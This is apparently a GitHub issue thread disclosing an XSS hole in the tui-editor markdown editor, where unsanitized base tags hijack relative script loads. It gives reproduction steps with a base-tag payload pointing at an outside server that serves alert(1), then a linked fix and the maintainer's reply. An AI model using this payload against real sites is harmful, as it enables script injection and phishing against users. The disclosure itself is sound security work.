XSS via base tag hijacking

[wfinn]

Describe the bug

Base tags are not sanitized, that can lead to XSS.

To Reproduce

I'll use the ui.toast.com/tui-editor playground to demonstrate this vulnerability.

Steps to reproduce the behavior:

1. Create a server that returns the XSS payload, (return alert(1) for every request) you can use avocadot0ast.free.beeceptor.com while it's available (it's a free server, too many requests and it will stop serving the payload)
2. Go to https://ui.toast.com/tui-editor
3. Put a base tag in the markdown <base href=https://avocadot0ast.free.beeceptor.com>
4. Scroll to the bottom of the page
5. Hover over the links (Weekly Picks, Release Notes, FE Guide etc)
6. See a request to some jsons, but also /component---src-pages-index-tsx-a5b41d7b681d62c9ee9a.js
7. See the alert(1)

Expected behavior

Base tags should be sanitized.

Additional context

I tested this with chromium. The base tag overwrites the base url, all relative links point to that url then. I could exploit this to real XSS because there's a script dynamically loaded from a relative link when hovering over the links at the bottom of the page. Even when there's no relative scripts after the base tag, this will hijack some links and might lead to phishing or other undesired effects.

[wfinn]

This is probably enough to fix this issue, but I haven't tested it, hence no PR https://github.com/wfinn/tui.editor/commit/1cec719f7e75d88bab50d595f46fe22e5fa5cc9f

[js87zz]

@wfinn
Thanks for reporting!

[wfinn]

base tags are sanitized in master